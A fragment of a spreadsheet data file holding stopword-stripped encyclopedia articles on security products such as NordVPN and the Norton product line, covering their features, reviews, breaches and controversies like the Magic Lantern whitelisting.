december 2020, company's network upgraded.in january 2022, nordvpn released open-source speed testing tool, available download github. additional features besides general-use servers, provider offers servers specific purposes, including sharing, double encryption, connection anonymity network. nordvpn offers three subscription plans: monthly, yearly bi-yearly. nordvpn also develops cybersec windows, macos, linux platforms, security feature works ad-blocker also automatically blocks websites known hosting malware.in november 2020, nordvpn launched feature scans dark determine user's personal credentials exposed. when dark monitor feature finds leaked credentials, sends real-time alert, prompting user change affected passwords.in february 2022, nordvpn introduced antivirus functionality available part regular license. opt-in threat protection feature blocks trackers, warns users malicious websites, blocks downloaded files contain malware. march 2022, feature available windows macos apps works without connecting server.in june 2022, nordvpn launched meshnet feature allows users create private network linking devices. some promoted cases include file sharing different devices, multiplayer gaming, virtual routing. research 2021, nordvpn conducted study digital literacy, surveying 48,063 respondents countries digital habits rating knowledge scale 100. germany topped list, followed netherlands switzerland. overall global score 65.2/100.in july 2021, nordvpn released report outlining proliferation smart devices consumer sentiment regarding security. poll 7000 people revealed people kind device household, almost fifth took measures protect them. similar responses found respondents countries well. year, nordvpn released report device sharing workplace. study found managers five times likely share work devices employees.nordvpn also conducted study time people spend online. survey 2,000 adults nordvpn found that, average, british people spend hours online week, amounts years lifetime. social responsibility nordvpn supported various social causes, including cybercrime prevention, education, internet freedom, digital rights. nordvpn offers emergency services activists journalists regimes censor internet freedom. 2020, nordvpn reported donated emergency accounts citizens ngos hong kong given additional 1,150 licenses various organizations.in 2020, nordvpn supported internet freedom festival, project promoting digital human rights internet freedom. nordvpn also sponsors cybercrime support network, non-profit organization assists people companies affected cybercrime. response covid-19 pandemic, nordvpn’s parent company nord security offered free online security tools (nordvpn, nordpass, nordlocker) affected nonprofit organizations, content creators, educators.in 2021, nordvpn proposed international day, bring attention people's right digital privacy, security, freedom. proposed annually observed august primary goal raise awareness cybersecurity best practices educate internet users importance online privacy tools cybersecurity general. reception positive review published tom's guide october 2019, reviewer concluded "nordvpn affordable offers features even hardcore elitists find suitable". reviewer also noted terms service mention country jurisdiction, writing company could transparent ownership.in february 2019 review magazine, nordvpn praised strong security features "enormous network servers", although price noted expensive. later review magazine, nordvpn praised extra features, rarely found vpns, wireguard protocol, large selection servers, strong security practices. despite winning outlet’s editor’s choice award, nordvpn still noted expensive.cnet's september 2021 review favorably noted nordvpn's smartplay feature, obfuscated servers, security efforts. while cnet praised nordvpn’s user-friendly interface, noted map’s design could improved.techradar recommended nordvpn security recent enhancements. also noted nordvpn worked well countries internet censorship, including great firewall china.in 2021, favorable review wired noted nordvpn’s price become affordable concluded “nordvpn fastest jack-of-all-trades provider right now.” however, article also noted still cheaper options available. awards 2019, nordvpn ‘best overall’ category proprivacy.com awards.in 2020, nordvpn german chip magazine’s ‘best security services’ category.in september 2021, nordvpn cnet’s ‘best reliability security’ award annual ‘best service’ awards.in 2022, nordvpn included cnet's best overall list. criticism october 2019, security researcher disclosed twitter server breach nordvpn involving leaked private key. cyberattack granted attackers root access, used generate https certificate enabled attackers perform man-in-the-middle attacks intercept communications nordvpn users. response, nordvpn confirmed servers based finland breached march 2018, evidence actual man-in-the-middle attack ever taking place. exploit result vulnerability contracted data center's remote administration system affected finland server january march 2018. according nordvpn, data center disclosed breach nordvpn april 2019, nordvpn ended relationship data center. security researchers media outlets criticized nordvpn failing promptly disclose breach company became aware nordvpn stated company initially planned disclose breach completed audit 5,000 servers similar risks.on november 2019, separate incident, reported approximately 2,000 usernames passwords nordvpn accounts exposed credential stuffing. also comparison virtual private network services encryption geo-blocking internet freedom panama internet privacy secure communication external links official website references</t>
  </si>
  <si>
    <t>Allway Sync</t>
  </si>
  <si>
    <t>allway sync backup file synchronization software allows backing synchronizing files different drives, different media (cd, dvd, flash, zip), remote server. features like super flexible file synchronizer, goodsync unison file synchronizer, capability remember previous state directories database, thus also synchronize deletions. synchronize directories once. update back-up files local network internet, although functionality support debated support many file systems, like fat, ntfs, samba, netware, cdfs, udf. includes scheduler. file masks filters. versions there various versions. users freeware version requested version software commercial purpose synchronize 40,000 files 30-day period. this version exactly functionality free version. allway sync (freeware version) allway sync (for businesses, governments military enterprise environments. removes 40,000 files/month limitation) allway sync (for removable drives) allway sync (for u3-enabled flash devices) allway sync portable application format (for sticks) also backup list backup software disk image comparison disc image software file synchronization comparison file synchronization software references "allway sync page cnet". cnet. 2009-08-04. retrieved 2009-08-11. external links http://www.allwaysync.com/</t>
  </si>
  <si>
    <t>Norman Safeground</t>
  </si>
  <si>
    <t>norman safeground develops sells data security software anti-virus, anti-spam, anti-spyware backup local support. company headquarters oslo, norway. norman safeground global partner-network, main market europe. norman competes antivirus industry avira, bullguard, f-secure, frisk, kaspersky, mcafee, panda security, sophos, symantec trend micro among others. history norman founded october 1984 oslo. company pioneer proactive security software solutions forensics malware tools, utilizing patented sandbox technology.in 1995, norman acquired percent ibas norwegian data recovery company. company listed oslo stock exchange august 1997. norman bought remaining percent stake ibas 1999. 2004, companies de-merged ibas listed separate entity oslo stock exchange.norman de-listed oslo stock exchange october 2009 acquired private equity fund capital partners. late 2012, norman split companies, norman safeground focusing consumers smes norman shark focusing enterprise market intrusion prevention solutions services. november 2014, norman safeground acquired technologies, years later acquired avast. references external links norman.com ibas capital oslo stock exchange threats "researchers identify year-long cyberespionage operation targeting israelis, palestinians". cio.com. retrieved 2013. "web security firm beefs diego operation". diego. retrieved 2013.</t>
  </si>
  <si>
    <t>Norton 360</t>
  </si>
  <si>
    <t>norton 360, developed symantec, “all-in-one” security suite consumer market. first released 2007, discontinued 2014; features carried successor, norton security. 2019, symantec, corporate name nortonlifelock, began promoting "new norton 360" product replacement norton security. version history project genesis symantec announced project genesis february 2006. genesis would differ symantec's consumer security products incorporating file backup performance optimization tools antivirus capabilities firewall. phishing protection real-time heuristics also planned. windows vista compatibility major aspect genesis. genesis slated release september. 2005, microsoft announced windows live onecare, security suite similar functionalities, slated release 2006. genesis renamed norton 2006. feature confirmed—it would functionalities norton internet security—with file backup, performance tools, phishing protection, real-time heuristics. public beta test planned summer 2006. final release date 2006. day, mcafee announced falcon, security suite similar functionalities norton onecare. however, dates delayed. onecare launched summer 2006 falcon entered public beta testing. some viewed norton response microsoft's antivirus software, onecare. however, release onecare, symantec lagging behind rivals. mark bregman, symantec's vice president, claimed upcoming norton intended compete onecare, stating somehow left wrong impression market place there's windows live onecare microsoft, there's falcon mcafee, there's nothing symantec."the first public beta delivered november 2006, compatible windows second beta subsequently released december 2006, adding compatibility windows vista build 6000. after 100,000 people tested software, symantec began distribution retailers february 2007. version version released february 2007. this version first symantec product sonar detect zero-day viruses. monitors applications malicious behavior, taking action needed. backup restore functionality allowed users back files online hard drive, dvd. performance optimization tools allowed users clear browser history temporary files. disk defragmenter bundled part optimization tools. phishing protection integrates internet explorer, warning users fraudulent sites. windows megahertz processor, megabytes ram, hard disk space required. under vista, processor, ram, hard disk space required. reviews cited norton 360's resource usage, relative norton internet security 2007, phishing protection. magazine found phishing protection feature effective blocking access fraudulent sites internet explorer firefox however, reviewers highlighted lack manual control advanced users. cnet noted lack phishing protection browsers internet explorer, mozilla firefox. cnet also highlighted lack wireless network tools, notifying users someone uninvited joins network help encrypting wireless signals. magazine criticized antispam filter version 1.0, finding blocked half spam mail, five percent false positive rate. version version released march 2008. backup feature inscribe data blu-ray discs. multiple installations norton also managed centralized location. when backing files online, user control amount bandwidth norton uses. registry cleaner bundled performance tools, allowing user remove invalid entries. phishing protection firefox added. supplementing phishing protection norton identity safe, stores login credentials websites. network allows users view status norton installations networked computers view basic information computer. system requirements remain version 1.0. magazine found spam filter inaccurate, percent false positive rate. cnet encountered problems installing version legacy machines. version version released march 2009. this version uses codebase norton internet security 2009. earlier versions, symantec rewrote code specifically norton 360.version incorporates norton safe web, offered standalone service earlier. safe integrates firefox internet explorer toolbar, blocking access fraudulent malware hosting sites. this toolbar also includes search box, routing search queries typed ask.com search engine. toolbar share code ask.com toolbar, classified spyware mcafee, trend micro, antivirus vendors. criticism search functionality, symantec announced ask.com search would hidden future releases version 3.0.the capability back files flash drive introduced release. files stored flash drive copied another computer without norton installed. norton also creates virtual drive windows explorer, allowing users browse backup files, stored locally online. users restore individual files using drag-and-drop technique. version retain previous versions files skips files open another program. startup application manager included release, allowing users control programs start login. complement application manager, norton measure impact programs login time.pc magazine highlighted version 3.0's inaccurate spam filter, misfiling half valid mail spam. magazine also noted support session symantec technician used shareware application malwarebytes anti-malware remove malware computer, referring "online norton program". controversy raised fact technician misleadingly referred program symantec product. version version released february 2010. this version adds many security features found norton internet security 2010. version also features change. prominent colors match gold black sunburst norton internet security. widely criticized antispam replaced effective brightmail, according symantec gives better results require training. version version released february 2011 offers improved performance virus detection. also provides updated versions sonar (version system insight. download insight supports internet explorer firefox browsers only, also supports following clients: (chat), messenger (chat), limewire (p2p), explorer (browser, e-mail chat), opera (browser), outlook (e-mail), thunderbird (e-mail), windows mail (e-mail), chrome (browser), bittorrent (p2p), (browser), yahoo messenger (chat), safari (browser), filezilla (file manager), outlook express (e-mail). features enhanced interface realistic icons animations also includes norton widgets platform integrates symantec online services directly also version reputation scan, gives user clear insight loaded applications files safeweb facebook, scans links wall verify safety. links norton recovery tools added scanner's interface start menu folder help restoring highly infected system. backup restore functionality also improved. passmark performance test rated norton fastest lightest all-in-one suite. version featured metered broadband modes, easily remembers logins personal info protecting online identity theft. version-less (unofficially 2013) 20.0 this version norton released september 2012, together newest norton antivirus norton internet security products. described version-less symantec's press release alluding automatic updates always keep software latest version. there specific version reference anywhere description software. software compatible windows this version norton features enhancements social networking protection, anti-scam capabilities, stronger networking defenses. norton also introduced extra tune disk optimizer. version (2014) version norton's security suite released september 2013, together newest norton antivirus norton internet security products. norton antivirus solution developed sonar technology, claims able detect threat, block remove thanks three five layers shields: threat monitoring, threat removal, network defense, last dealing online threats actually reach user’s computer. protection also granted analyzing behavior known menaces. another important aspect derives stealth capabilities, five shields work silently background, performing scans, updates back-ups automatically need whatsoever care important files. browser protection download insight keen dangerous applications, warning user eventual threats running computer. version (2015) version released september 2014. this release marketed norton security 2015, however norton users able update v22, even norton retiring norton brand. appearance software identical norton security 2015, except product name top-left corner. norton (2019) april 2019, norton brand revived replace norton security, adding norton secure vpn, online backup per-user, well premium plans incorporating lifelock identity theft protection. norton editions norton available norton (standard), norton premier edition, norton multi-device. premier edition functions standard edition, difference comes online storage versus included standard edition. norton multi-device actually three products subscription: norton premier edition, norton internet security mac®, norton mobile security. comparison norton editions norton shows features coverage. norton 360- gold edition credit card type unique sets alpha-numeric data reverse sold instructions online install installation page. norton software sold; purchased subscription stated period (e.g. year). software (e.g. firewall, antivirus) automatically disabled subscription period, unless subscription purchased. special edition norton premier edition, branded norton security suite, used available free customers comcast xfinity internet service 1/1/2021. comcast norton security subscriptions ended 1/1/2021. difference norton premier edition norton security suite latter include online storage feature. major version updates norton security suite typically occur month norton 360. windows consumer preview compatibility windows consumer preview released february 2012. symantec announced norton antivirus internet security, well newest norton version compatible windows disadvantages older versions cooperation symantec, compliance fbi, whitelisted magic lantern, keylogger developed fbi. purpose magic lantern obtain passwords encrypted e-mail part criminal investigation. magic lantern first reported media sullivan msnbc november 2001 bridis associated press. magic lantern deployed e-mail attachment. when attachment opened, trojan horse installed suspect's computer. trojan horse activated suspect uses encryption, often used increase security sent e-mail messages. when activated, trojan horse password, allows decrypt user communications. symantec major antivirus vendors whitelisted magic lantern, rendering antivirus products, including norton internet security, incapable detecting magic lantern. concerns include uncertainties magic lantern's full potential whether hackers could subvert purposes outside jurisdiction law.graham cluley, technology consultant sophos, said knowing written fbi, even did, wouldn’t know whether used commandeered third party". another reaction came marc maiffret, chief technical officer cofounder eeye digital security, "our customers paying service, protect forms malicious code. enforcement's not, not, make exceptions enforcement malware tools."fbi spokesman paul bresson, response magic lantern needed court order deploy, "like technology projects tools deployed would used pursuant appropriate legal process." proponents magic lantern argue technology would allow enforcement efficiently quickly decrypt messages protected encryption schemes. implementing magic lantern require physical access suspect's computer, unlike carnivore, predecessor magic lantern, since physical access computer would require court order. uninstallation norton internet security (windows versions) criticized uninstalling completely, leaving unnecessary files registry entries. versions prior also installed separate liveupdate program, updates norton-branded software. user must uninstall norton internet security liveupdate component manually. liveupdate component purposely left behind update norton-branded products, present. symantec developed norton removal tool remove registry keys values along files folders. uninstaller must twice: initially, computer restart, requiring second restart. uninstallation remove subscription data, preserved prevent users installing multiple trial copies. windows service packs when norton version installed, users encountered incompatibilities upgrading windows service pack windows vista service pack users report numerous invalid windows registry keys added tool named fixcss.exe, resulting empty device manager missing devices wireless network adapters. symantec initially blamed microsoft incompatibilities since accepted partial responsibility. dave cole, senior director product management, acknowledged users running norton products experiencing problems, said numbers small. cole also said symantec done "extensive testing" products windows sp3, issue encountered. cole blamed microsoft "this related sp3." microsoft recommended users contact windows customer support. resolve problem, symantec issued intended users upgrading. symantec also recommends disabling tamper protection component 2008 release, dubbed symprotect. tool remove added registry entries available symantec. windows vista sarah hicks, symantec's vice president consumer product management, voiced concern windows vista 64-bit's patchguard feature. patchguard designed microsoft ensure integrity kernel, part operating system interacts hardware. rootkits hide operating system's kernel, complicating removal. mike dalton, european president mcafee said, "the decision build wall around kernel assumption can't breached ridiculous", claiming microsoft preventing security vendors effectively protecting kernel promoting security product, windows live onecare. hicks said symantec mind competition onecare. symantec later published white paper detailing patchguard instructions obtain patchguard exploit. after negotiations investigations antitrust regulators, microsoft decided allow security vendors access kernel creating special instructions. subscription expiration norton comes one-year subscription activated upon installation, valid three home computers. expiration subscription blocks access program updates shuts antivirus firewall well. tools, bundled password manager user saved passwords also inaccessible. users often understand completely exposed, become infected viruses. also norton internet security norton antivirus references external links norton homepage norton</t>
  </si>
  <si>
    <t>Norton AntiBot</t>
  </si>
  <si>
    <t>norton antibot, developed symantec, monitored applications damaging behavior. application designed prevent computers hijacked controlled hackers. according symantec, million computers hijacked, majority users unaware computers hacked. antibot designed used conjunction antivirus software. unlike traditional antivirus products, antibot signatures; delay vendor discovers virus distributes signature. during delay, computers affected. instead, antibot attempts identify virus actions; viruses malicious nature. however, antibot intended replace antivirus product. program uses technology licensed sana security. product discontinued acquired sana security january 2009, developing standalone program similar antibot called identity protection, also discontinued integrated internet security 2011. product updates technical support available symantec year customer's last purchase renewal. history kim, director product management symantec, highlighted rise botnets. botnet collection compromised computers, known bots, hackers usually control malicious purposes. main uses botnets include identity theft e-mail spam. cited percent increase bots first half 2006 second half. all, million active bots 2006.on june 2007, symantec released beta version norton antibot. antibot designed supplement user's existing antivirus software. unlike traditional antivirus software, antibot signatures identify malware. instead, monitors running applications damaging malicious behavior, licensing technology sana security. antibot also supplement sonar technology symantec, found norton antivirus 2007, norton internet security 2007, norton 360. similar antibot, sonar monitors malicious behavior. however, sonar continuously background; virus scan specific products.antibot made available general public july 2007. january 2009, announced plans acquire sana security finalized. j.r. smith, technologies, highlighted 40,000 unique malware samples analysts day. noted time frame sample analyzed signature created, emphasizing need "instant protection", since hackers constantly modifying malicious software evade signature detection. often, several strains, variations, virus, different classification signature. symantec confirmed ceasing sales distribution norton antibot early 2009. product help updates would still available year following customer's last purchase renewal. reception magazine noted antibot's average ability identify malicious programs based behavior fact mistakenly mark legitimate program malicious testing. however, infected systems antibot failed install caused blue screens failed completely remove virus.a technical limitation antibot cannot detect inactive malware since behavior software monitor. references</t>
  </si>
  <si>
    <t>Norton AntiVirus</t>
  </si>
  <si>
    <t>norton antivirus anti-virus anti-malware software product, developed distributed nortonlifelock since 1991 part norton family computer security products. uses signatures heuristics identify viruses. other features included e-mail spam filtering phishing protection. symantec distributes product download, copy, software. norton antivirus norton internet security, related product, held retail market share security suites first half 2007. competitors, terms market share study, include antivirus products trend micro, kaspersky lab.norton antivirus runs microsoft windows, linux, macos. windows support development versions 2006 2008. version 2009 windows supported update already. versions 2010, 2011, 2012 natively support windows without needing update. version version fully compatible lion. with 2015 series products, symantec made changes portfolio briefly discontinued norton antivirus. this action later reversed introduction norton antivirus basic. origins 1989, symantec launched symantec antivirus macintosh (sam). 2.0, released march 1990, incorporated technology allowing users easily update intercept eliminate viruses, including many exist time program's release.in august 1990 symantec acquired peter norton computing peter norton. norton company developed various utilities including norton utilities, include antivirus features. symantec continued development acquired technologies. technologies marketed name "norton", tagline "from symantec". norton's crossed-arm pose, registered u.s. trademark, traditionally featured norton product packaging. however, pose later moved spine packaging, eventually dropped altogether.by early 1991, u.s. computers invaded hundreds foreign virus strains corporate infection becoming serious problem. symantec's norton group launched norton antivirus (nav) compatible computers. product, suggested retail $129, featured norton crossed-arm pose, wearing pink shirt surgical mask covering nose mouth. with 1998 version update, renamed norton antivirus (nav) macintosh. windows edition product activation introduced norton antivirus 2004, addressing estimated million counterfeit norton products sold. alphanumeric code generated identify computer's configuration, ties product key. users allowed activate product five times product key. spyware adware detection removal introduced 2005 version, tagline "antispyware edition". tagline dropped later releases. however, norton antivirus 2009 classic include spyware adware detection. classic edition marketed alongside norton antivirus 2009, include spyware adware detection. existing users 2006, 2007, 2008, 2009 versions upgrade latest 2010 version without buying subscription. upgrading preserve number days left user's subscription. version 2006 (13.0) redesigned main graphical user interface aggregates information central user interface. cnet reports norton protection center, useful, attempts advertise additional products. facilitate detection zero-day malware, bloodhound disassembles variety programming languages, scans code malicious instructions using predefined algorithms. internet explorer homepage hijacking protection introduced release well; however notably missing search engine hijacking protection. cnet highlighted norton antivirus 2006's noticeable impact system performance.operating system requirements call windows 2000 service pack windows free space processor required either operating system. required windows 2000, required windows version 2007 (14.0) norton antivirus released september 2006. symantec revised norton antivirus goal reducing high system resource utilization. windows vista compatibility introduced release well. despite code rewritten, cnet reports mixed results performance testing.windows 2000 compatibility dropped release. compatibility 32-bit versions windows vista added release patch symantec. hardware requirements vista call free space, processor ram. requirements windows similarly call free space, processor, ram. version 2008 (15.0) norton antivirus 2008 released august 2007. emphasizing malware prevention, features include sonar, looks suspicious application behavior. this release adds real-time exploit protection, preventing attackers leveraging common browser application vulnerabilities.when installed 32-bit versions windows service pack free space, processor, required. when installed 32-bit 64-bit versions windows vista, free space, processor, needed. version 2009 (16.0) norton antivirus 2009 released september 2008. addressing performance issues, changes made, "zero-impact" goal.benchmarking conducted passmark software highlights 47-second install time, second scan time, memory utilization. symantec funded benchmark test provided scripts used benchmark participating antivirus software.the security status settings displayed single main interface. usage monitor displays total utilization norton's usage main interface. other features include norton insight, whitelisting technology cuts scanning times mapping known safe files using information online database. address malware response times, updates delivered every minutes. however, updates tested symantec, cause false positives, incorrectly identify files malicious. exploit scanner found 2007 2008 versions dropped release. when installed 32-bit versions windows service pack free space, processor, required. when installed 32-bit 64-bit versions windows vista, free space, processor, required. variations norton antivirus 2009 also marketed symantec. gaming edition provides finer control norton downloads updates allows components suite disabled either manually automatically computer enters full-screen mode. classic edition cannot find remove adware spyware. version 2010 (17.0) version 17.0 released september 2009. several features updated release, including sonar, dubbed sonar uses information determine application truly malicious. norton insight present users information origins, activities, performance applications along reputation data. feature codenamed autospy helps users understand norton malware found. previous releases removed threats sight quietly warned users, potentially confusing users deceived downloading rogue security software. much information placed back main window; toggle button switches sides. symantec also added windows support. aside that, symantec also added norton download insight prevent drive drive downloads. version 2011 (18.0) version 2012 (19.0) version 2013 (20.0) version 2014 (21.0) lack 2015 version symantec briefly discontinued standalone norton antivirus product 2015 instead replacing norton security. version 2016 (22.0) criticism cooperation confirmed active development magic lantern, keylogger intended obtain passwords encrypted e-mail documents criminal investigations. magic lantern first reported media sullivan msnbc november 2001 bridis associated press. intends deploy magic lantern form e-mail attachment. when attachment opened, installs trojan horse suspect's computer, activated suspect uses encryption, often used increase security sent email messages. when activated, trojan password, allows decrypt user communications. symantec major antivirus vendors whitelisted magic lantern trojan, rendering antivirus products, including norton antivirus, incapable detecting concerns around whitelisting include uncertainties magic lantern's full surveillance potential whether hackers could subvert redeploy purposes outside enforcement.graham cluley, technology consultant sophos, said knowing written fbi, even did, wouldn’t know whether used commandeered third party". another reaction came marc maiffret, chief technology officer co-founder eeye digital security states: "our customers paying service, protect forms malicious code. enforcement's not, not, make exceptions enforcement malware tools."proponents magic lantern argue technology would allow enforcement efficiently quickly decrypt time-sensitive messages protected encryption schemes. implementing magic lantern require physical access suspect's computer, unlike carnivore, predecessor magic lantern, since physical access computer would require court order. spokesman paul bresson, response question whether magic lantern also needed court order deploy, would "like technology projects tools deployed would used pursuant appropriate legal process." update disables legitimate software january 2010 symantec anti-virus update marked spotify trojan horse disabling software across millions pcs. product support retail customers report slow indifferent service bugs. examples include faulty error message stating current subscriptions expired. users received error stating "your virus protection cannot updated." this error occurred update software refused allow daily updates. though reported 2004, corrected 2005 2006 versions. another incident occurred 2007, norton antivirus flagged components pegasus email client malicious, rendering program corrupted. symantec customer service addressed problem running checklist troubleshooting steps always successful. faulty update july 2006, symantec released faulty update norton antivirus 2006 users. users reported onscreen message stating "norton antivirus 2006 support repair feature. please uninstall reinstall.". symantec claimed faulty update downloaded customers 1:00 7:00 july 2006. symantec developed workaround tool listed troubleshooting steps, available here. company released statement, stating expected deliver repair patch affected users monday, july 2006." uninstallation norton antivirus criticized refusing uninstall completely, leaving unnecessary files behind. another issue versions prior 2009 installed liveupdate, updates norton-branded software, separately. user must uninstall norton antivirus liveupdate component manually. liveupdate component purposely left behind update norton-branded products, present. response, symantec developed norton removal tool (symnrt) remove leftover registry keys values along files folders. however, neither route uninstallation remove subscription data, preserved prevent users installing multiple trial copies. symnrt remove norton programs: norton antispam 2004 2005 norton antivirus 2003 2012 norton ghost 2003,9.0,10.0,12.0,1 15.0 norton goback norton internet security 2003 2012 norton password manager norton personal firewall 2003 2006 norton systemworks 2003 2009 norton confidential online 2007 norton add-on pack norton save restore norton 360/security suite/business suite norton safety minder norton safe 3.2once symnrt started removal process, cannot stopped. recommended close running programs prior running symnrt. act! winfax users recommended back databases running symnrt. incompatibilities zonealarm norton antivirus 2007 install alongside zonealarm. this incompatibility caused annoyance norton customers purchased norton antivirus 2007 prior warning notice incompatibility. symantec recommends removing zonealarm, reinstalling internet worm protection feature disabled, controls applications access internet protocols pifts.exe march 2009, users norton antivirus 2006 2007 experienced firewall warning stating norton-associated file, "pifts.exe", trying connect internet. although file revealed harmless diagnostic patch, program gained attention media symantec removed posts forum concerning pifts. with information available purpose program speculation program malware backdoor.the sans internet storm center claimed spoken symantec employee confirmed "the program theirs, part update process intended harm." graham cluley, consultant antivirus vendor sophos found pifts connected symantec server, forwarding product computer information.on march symantec made official response pifts program, claiming posts support forum deleted forum spam rules; however deletion pifts-related posts began spam attacks. symantec stated pifts diagnostic patch. cole stated purpose update help determine many customers would need migrated windows 7-compatible versions norton antivirus. pifts apparently released without digital signature verify identity, causing firewalls prompt permission attempted connect internet. consumer complaints symantec criticized consumers perceived ethical violations, including allegations support technicians would tell customers systems infected needed technician resolve remotely extra fee, refuse refund customers alleged systems actually infected. macintosh edition norton antivirus introduced support v10.5 leopard platform, capability detect macintosh windows malware. other features include vulnerability scanner, blocks attackers leveraging software exploits. norton antivirus also includes ability scan within compressed archived files, time capsule volumes. operating requirements call tiger. powerpc intel core processor, ram, free hard disk space also required. norton antivirus dual protection intended macintosh users windows running systems, using boot camp virtualization software vmware fusion. provides license norton antivirus norton antivirus 2009. comparison software from 2009 2012 editions, symantec made huge changes products' speed performance. norton products running processes, using ram. soon virus recognized, information regards virus virus signature) stored pandemic definitions file, contains vital know-how become aware virus. according tests sponsored symantec, passmark security benchmark 2012 norton antivirus norton internet security lightest suites available. av-comparatives.org also tested products gave similar results. pcmag recognises 2011 2012 lines fastest strongest protection. pcworld's tests security software norton internet security 2009 place. 2011, test pcworld, norton internet security winner. dennis technology labs tests sponsored symantec) confirms performance effectiveness norton 2011 2012 lines. norton antivirus gcsb amendment bill august 2013 prime minister zealand john addressed identified "misinformation" surrounding gcsb amendment bill, claiming actions government communications security bureau analogous norton antivirus. also internet security comparison antivirus software comparison firewalls references external links official website</t>
  </si>
  <si>
    <t>Norton Confidential</t>
  </si>
  <si>
    <t>norton confidential program released 2006 designed encrypt passwords online detect phishing sites. references</t>
  </si>
  <si>
    <t>Norton ConnectSafe</t>
  </si>
  <si>
    <t>norton connectsafe free public service offered symantec corporation claimed offer faster reliable browsing experience blocking undesirable websites. service retired november 2018. history service opened public june 2010. norton connectsafe retirement announced planned occur november 2018. functionality provides protection threats three protection policies. automatically blocks known unsafe, fraudulent, phishing infected websites cause harm device. also blocks unwanted content, suitable children. users norton connectsafe setting server addresses norton connectsafe servers. client software windows, android available automatically configure devices norton connectsafe.dns queries routed norton connectsafe checked using norton safe database ensure point malicious inappropriate websites. symantec thus seeks block malware phishing attempts, well pornographic inappropriate websites user desires. norton connectsafe also intercept misspelled domain names offer suggestions display advertising. this redirection breaks non-web applications rely getting nxdomain response non-existent domains. ipv4 addresses following addresses registered norton connectsafe: policy security this policy blocks sites hosting malware, phishing sites, scam sites. choose policy following addresses preferred alternate server addresses:199.85.126.10 199.85.127.10policy security pornography addition blocking unsafe sites, policy also blocks access sites contain sexually explicit material. choose policy following addresses preferred alternate server addresses:199.85.126.20 199.85.127.20policy security pornography non-family friendly this policy ideal families young children. addition blocking unsafe sites pornography sites, policy also blocks access sites feature mature content, abortion, alcohol, crime, cults, drugs, gambling, hate, sexual orientation, suicide, tobacco, violence. choose policy following addresses preferred alternate server addresses199.85.126.30 199.85.127.30 also domain name system public recursive name server name server opendns google public quad9 references</t>
  </si>
  <si>
    <t>Norton Insight</t>
  </si>
  <si>
    <t>norton insight whitelists files based reputation. norton-branded antivirus software leverages data skip known files virus scans. symantec claims quicker scans accurate detection technology. development insight codenamed clean. initial help users determine programs internet safe install. clean would provide risk assessment discern safe malicious files. however, goal later changed making virus scans efficient; instead scanning every file, known files skipped, cutting scanning times. basic introduction usage norton community watch, voluntary anonymous service, allows user's norton product forward information symantec servers. among data collected processes running sha256 values. reappearing hash value corresponding file whitelisted, norton insight checks processes user's computer whitelist. matching processes excluded scanning. when process "trusted", deemed safe excluded risk scanning. there trust levels; "standard" "high". third option disable norton insight. standard trust, processes appearing majority participants' computers deemed safe. high trust, addition, excludes digitally signed files scanning. tamper protection norton analyzes ntfs file system upon startup, unaccounted changes found, trust values processes system revoked. case mistake, revocation mechanism implemented, clients receive list revoked sha256 values liveupdate. client file matching sha256 currently trusting file, trust revoked, file scanned.norton file insight feature released norton 2010 products. norton file/download insight norton download insight feature, provides insight files download install computer. while file insight give reputation information, locates file computer, well feature copies information users clipboard. supports norton download insight feature, assizes reputation file. file insight window provides following information: file type file name date file installed date file last used lineage details file actions file performs system level file uses resources computer performance impact stability file specific operating system version file developed file? issues upon release download insight program would erroneously flags downloaded file digital signature version number therefore potential threat. reception tech herald, tested norton internet security 2009, found insight affected system performance whitelisting files. after scans, publication also noted total number files scanned number trusted (skipped) files varied scan. average amount time insight took scan megabyte folder 21,816 clean files 0:00:24:41. despite oddities, editor observed norton internet security 2009 faster subsequent products. also sonar references external links norton video: norton insight what norton insight?</t>
  </si>
  <si>
    <t>Norton Internet Security</t>
  </si>
  <si>
    <t>norton internet security, developed symantec corporation, computer program provided malware protection removal subscription period. used signatures heuristics identify viruses. other features included personal firewall, email spam filtering, phishing protection. with release 2015 line summer 2014, symantec officially retired norton internet security years chief norton product. superseded norton security, rechristened adaptation norton security suite.symantec distributed product download, boxed software. some retailers distributed flash drive. norton internet security held market share united states retail security suite category first half 2007. history august 1990, symantec acquired peter norton computing peter norton. norton company developed various applications dos, including antivirus. symantec continued development acquired technologies, marketed name "norton", tagline "from symantec". norton's crossed-arm pose, registered u.s. trademark, featured norton product packaging. however, pose later moved spine packaging, disappeared. users 2006 later versions could upgrade replacement software without buying subscription. upgraded product retains earlier product's subscription data.releases named year internal version numbers well. internal version number advanced 15.x 2008 edition match norton antivirus release year. 2013 (20.x) release product dropped year name, although still referenced venues. 2000 (1.0, 2.0) norton internet security 2000, released january 2000, symantec's first foray beyond virus protection content filters. release followed alliance internet provider excite@home antivirus vendor mcafee.com provide internet subscribers mcafee's firewall software, mcafee personal firewall. version 2000s firewall, based atguard wrq, filters traffic packet level. could block activex controls java applets. other features included cookie removal, banner blocking. zdnet found blocker remove graphics ads, breaking pages. adjusting settings fixed problem, however process complicated. zdnet noted lack information presented concerning attacks firewall blocked. norton liveupdate downloads installs program updates. family edition adds parental controls. parental controls backed quality control team people searched inappropriate content. found content categorized subject matter placed blacklist 36,000 sites. designated administrator could blocked sites, however pre-supplied blacklist cannot viewed edited since hard coded. administrators could block certain subject matter. another option block sites, create whitelist allowed sites. family edition could block transmission specified personal information. such information replaced letter "x". however, noted x-rated sites retrieved personal information queried search engine.version released june 2000 2001 (2.5, 3.0) version 2001 (2.5) released september 2000, adding support windows addition windows series, windows windows 2000. following attacks iloveyou anna kournikova script viruses, version could block malicious scripts without virus signatures, analyzing behavior.the firewall scans internet-enabled applications creates access rules installation based knowledge base maintained symantec. magazine testing, installation took minutes complete pentium internet-enabled applications. using firewall, users could determine whether accept cookies, java applets, activex controls global per-site basis. feature, intrusion detection autoblock, could detect port scans block intrusion attempts. program provides notifications intrusion attempts, reporting severity level providing access threat details. alternatively, firewall could computer stealth, essentially hiding system. users could configure security level, managing number notifications. testing conducted magazine using shields symantec's security check found firewall successfully stealthed ports, hiding computer view. leak test conducted firewall's ability detect outbound connections. each attempt detected suite offered block attempts.the family edition, like prior version, included parental controls information filtering feature. parental controls come list objectionable sites, separated categories. list updated every weeks norton liveupdate. using list alone, norton blocks listed sites. consequently, norton block sites next update. parents could customize list, adding removing sites. list allowed sites could created restrict children specific sites. this version used application blocking rather protocol port filtering control internet access. children could restricted applications used access internet. parental control profile could child, settings could automatically configured based group, whether child, :teenager, adult, administrator. internet usage violations noted report presented parents. magazine found enabling parental controls added minute computer's boot time.version released march 2001. 2002 (4.0, 5.0) version 2002 announced august 2001. family edition 